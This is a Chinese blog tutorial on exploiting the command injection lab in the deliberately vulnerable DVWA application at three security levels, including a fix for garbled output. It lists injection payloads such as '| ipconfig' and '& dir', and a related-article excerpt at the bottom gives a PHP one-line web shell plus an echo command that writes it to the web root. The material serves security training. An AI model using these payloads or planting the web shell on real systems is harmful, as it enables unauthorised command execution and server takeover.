DVWA-命令注入 全级别教程

已于 2022-05-16 15:46:24 修改
阅读量6.2k 收藏 23
点赞数 7
CC 4.0 BY-SA版权
分类专栏: DVWA 文章标签: web安全 安全 php
于 2020-09-08 16:01:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44716769/article/details/108470725
本文详细介绍了在DVWA平台上进行命令注入攻击的三种难度级别:Low、Medium和High,展示了如何利用命令注入漏洞获取服务器文件列表和本机IP地址,并提供了解决中文乱码问题的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

命令注入

文章目录

实验准备

在做DVWA攻防练习时发现,注入命令返回的信息竟然是乱码,猜测可能是因为DVWA是在windows下部署的原因,底层系统是中文GBK编码所致。
在输入127.0.0.1测试时,发现如下乱码
在这里插入图片描述

在PHPstudy的安装目录下(每个人不同,本例中)目录下,有个dvwaPage.inc.php文件,打开文件在277行修改,将UTF-8改为GBK或者GB2312即可。
在这里插入图片描述在这里插入图片描述在这里插入图片描述

重新输入命令,不再乱码
在这里插入图片描述

Low等级

查看源码

在这里插入图片描述

stristr(string,search,before_search)
stristr函数搜索字符串在另一字符串中的第一次出现,返回字符串的剩余部分(从匹配点),如果未找到所搜索的字符串,则返回FALSE。参数string规定被搜索的字符串,参数search规定要搜索的字符串(如果该参数是数字,则搜索匹配该数字对应的ASCII值的字符),可选参数before_true为布尔型,默认为“false”,如果设置为“true”,函数将返回search参数第一次出现之前的字符串部分。
php_uname(mode)
这个函数会返回运行php的操作系统的相关描述,参数mode可取值”a” (此为默认,包含序列”s n r v m”里的所有模式),”s ”(返回操作系统名称),”n”(返回主机名),” r”(返回版本名称),”v”(返回版本信息), ”m”(返回机器类型)。
可以看到,服务器通过判断操作系统执行不同ping命令,但是对ip参数并未做任何的过滤,导致了严重的命令注入漏洞。

利用| ipconfig获得本机的IP地址

在这里插入图片描述

命令192.168.0.105 && dir可以获得服务器上的文件列表

在这里插入图片描述

Medium等级

查看源码

在这里插入图片描述

查看源码,发现把”&&” 、”;”转为空,即删除
”&&”与” &”的区别:

  1. Command 1&&Command 2
    先执行Command 1,执行成功后执行Command 2,否则不执行Command 2
  2. Command 1&Command 2
    先执行Command 1,不管是否成功,都会执行Command 2

命令192.168.0.105 & dir可以获得服务器上的文件列表

在这里插入图片描述

利用127.0.0.1 &;& ipconfig获得本机的IP地址

在这里插入图片描述

High等级

查看源码

在这里插入图片描述

命令192.168.0.105 |dir可以获得服务器上的文件列表

在这里插入图片描述

DVWA-命令注入
qq_60848021的博客
06-26 1742
命令注入漏洞的函数:system(),exec(),passthru(),shell_exec(),''(与shell_exec()功能相同。1,分析源码使用的函数是shell_exec()2,验证3,漏洞测试| :前面命令的输出结果作为后面命令的输入;||:前面的命令执行失败以后才会执行后面的命令;&:前面的命令执行后接着执行候命的命令;&&:前面的命令执行成功以后才可以执行下面的命令。存疑:当使用;连接时,出现错误原因是DVWA的服务器是winserver2008,” ; “分号是应用在linux系统中
DVWA通关攻略之命令注入
勿山几已
05-06 2609
简要介绍命令注入漏洞,演示手工和burp爆破挖掘命令注入漏洞/RCE
渗透入门必备-DVWA靶场搭建教程(极其详细)
最新发布
bdfcfff77fa的博客
06-25 824
将。
2、DVWA——命令注入
qq_55202378的博客
08-29 1012
DVWA 命令·注入
新手向 DVWA使用教程一 Command Injection 命令注入
qq_44927212的博客
01-02 631
在low等级中,查看源代码我们可以得知: <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's'...
DVWA-master.zip
01-04
DVWA中,命令注入漏洞允许攻击者执行服务器上的任意系统命令。学习者可以从中学习如何过滤和验证用户输入,防止这类攻击。 5. **文件包含漏洞** 文件包含漏洞通常发生在应用程序允许用户指定要包含的文件路径时...
DVWA-master安装包
02-28
1. **注入漏洞**:包括SQL注入命令注入等,通过在用户输入的数据中插入恶意代码,攻击者可以获取数据库信息甚至控制服务器。 2. **跨站脚本(XSS)**:分为反射型和存储型两种,XSS允许攻击者通过注入可执行的...
dvwa---命令注入
qq_74806534的博客
01-09 1214
ping (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序。Ping发送一个ICMP;回声请求消息给目的地并报告是否收到所希望的ICMP echo (ICMP回声应答)。我个人认为:它是用来检查网络是否通畅或者网络连接速度的命令,ping命令可以对一个网络地址发送测试数据包,看该网络地址是否有响应并统计响应时间,以此测试网络。
DVWA-command injection
__52Hz__
07-28 1382
原文地址:http://www.fwqtg.net/注入技术-dvwa命令注入.html (转载了部分内容) Command Injection,即命令注入攻击,是指由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。 一
DVWA靶场-命令注入漏洞~保姆级教程!!!
2301_77360738的博客
05-10 2017
超详细的dvwa靶场Command injection命令注入漏洞低、中、高等级的面讲解,小白入!!!
DVWA-命令注入(Command Injection)
weixin_58954236的博客
08-19 750
ipconfig,net user(查看系统用户),dir(查看当前目录),find(查找包含指定字符的行),whoami(查看系统当前有效用户名)A&B(简单的拼接,AB之间无制约关系),A&&B(A执行成功才会执行B),A|B(A的输出作为B的输入),A||B(A执行失败,然后才会执行B)
DVWA —— Command Injection 命令注入
YouTheFreedom的博客
05-21 575
命令执行漏洞是指代码未对用户可控参数做过滤,导致直接带入执行命令的代码中,对恶意构造的语句,可被用来执行任意命令。黑客可在服务器上执行任意命令,写入后门,从而入侵服务器,获取服务器的管理员权限,危害巨大。
DVWA 命令注入
qq_41326328的博客
03-12 1278
DVWA 命令注入 实验 首先我们探讨一下 什么叫命令注入,指的是利用没有验证过的恶意命令或代码,对网站或者服务器进行渗透攻击。 注入有很多种,并不仅仅是SQL注入。比如: 命令注入(Command injection) Eval注入(Eval injection) 客户端脚本攻击(Script insertion) 跨网站脚本攻击(Cross Site Scripting,XSS) SQL注入...
DVWA命令注入(Command Injection)
qq_54537919的博客
06-25 902
DVWA命令注入(Command Injection) 原理 low、 medium、 high
DVWA命令注入
dongf2019的博客
12-12 365
原文链接:https://blog.youkuaiyun.com/2301_77360738/article/details/138647536。命令1 && 命令2 :先执行命令1执行成功后才会执行命令2 ,若命令1执行失败,则不执行命令命令1 || 命令2 :命令1执行失败,再执行命令2(若命令1执行成功,就不再执行命令2)命令1 & 命令2 :不管命令1执行成功与否,都会执行命令2,也就是命令1和命令2都执行。命令1 | 命令2 :只执行命令2(将上一个命令的输出作为下一个命令的输入)
DVWA】Command Injection(命令注入)通关教程
weixin_30527551的博客
08-01 740
日期:2019-08-01 16:05:34 更新: 作者:Bay0net 介绍:利用命令注入,来复习了一下绕过过滤的方法,还可以写一个字典来 fuzz 命令注入的点。 0x01、 漏洞介绍 仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致信息泄露或者正常数据的破坏。 用户的一切输入都是...
DVWA命令注入(Command Injection)
qq_39682037的博客
03-22 2183
命令注入(Command Injection) 命令注入是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用程序将不安全的用户提供的数据(表格,cookie,HTTP标头等)传递到系统外壳时,可能会发生命令注入攻击。在这种攻击中,攻击者提供的操作系统命令通常是使用易受攻击的应用程序的特权执行的。由于没有足够的输入验证,因此可能会发生命令注入攻击。 Security Lev...
dvwa命令注入一句话木马
03-23
### DVWA 命令注入实现一句话木马部署教程 #### 背景介绍 DVWA (Damn Vulnerable Web Application) 是一个用于学习和实践 Web 安全漏洞的平台[^3]。它提供了多种不同级别安全挑战,允许用户通过不同的攻击手段来探索常见的 Web 漏洞。 #### 命令注入原理 命令注入是一种典型的输入验证不足引发的安全漏洞。当应用程序未正确过滤用户的输入时,恶意用户可以通过构造特殊字符组合(如 `;` 或者 `&&`),从而在目标服务器上执行任意操作系统命令[^4]。 #### 利用过程详解 ##### 1. 准备环境 确保已安装并运行好 DVWA 平台。可以手动搭建或者直接使用预配置好的 Metasploit 表格虚拟机进行实验[^1]。 ##### 2. 测试命令注入点 进入 DVWA 的 “Command Execution” 功能模块,在该页面尝试提交简单的系统命令以确认是否存在命令注入漏洞。例如: ```bash ping localhost; ``` 如果返回了正常的 Ping 结果,则说明存在潜在的命令注入风险[^5]。 ##### 3. 构造有效载荷 为了部署一句话木马,需要先创建一个 PHP 文件作为后门程序。以下是常见的一句话木马代码片段: ```php <?php @eval($_POST['cmd']);?> ``` 将上述内容保存为 `.php` 后缀名文件,并将其上传至目标服务器。由于题目提到的是利用 Burp Suite 来拦截请求包的方式,因此可以直接按照以下流程操作[^2]: - 使用工具修改 HTTP 请求头中的 Content-Type 字段伪装成图片或其他合法类型; - 将实际发送的数据替换为我们准备好的恶意脚本内容。 注意:某些情况下可能还需要绕过文件扩展名检测机制才能顺利完成整个渗透测试环节。 ##### 4. 执行命令写入木马 假设我们已经找到了合适的路径 `/var/www/html/uploads/` 可供存储我们的恶意文件。此时可通过精心设计的字符串完成最终目的: ```bash echo "<?php @eval(\$_POST['cmd']);?>" > /var/www/html/uploads/shell.php && chmod 777 /var/www/html/uploads/shell.php ``` 此条指令的作用在于依次完成两项任务——一是生成指定名称的新文件并将预先编写完毕的内容填充进去;二是赋予新建立起来的对象足够的权限以便后续访问调用。 ##### 5. 访问并控制目标主机 一旦成功放置了一句话木马之后,就可以借助专门的客户端软件连接过去实施进一步的操作了。比如设置参数 POST 数据字段名为 cmd ,其对应的值设为 ls –al 查看目录结构等等。 --- ### 注意事项 在整个过程中务必严格遵守法律法规以及道德准则,仅限于授权范围内的研究活动才被允许开展此类实践活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Web Security Loop

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值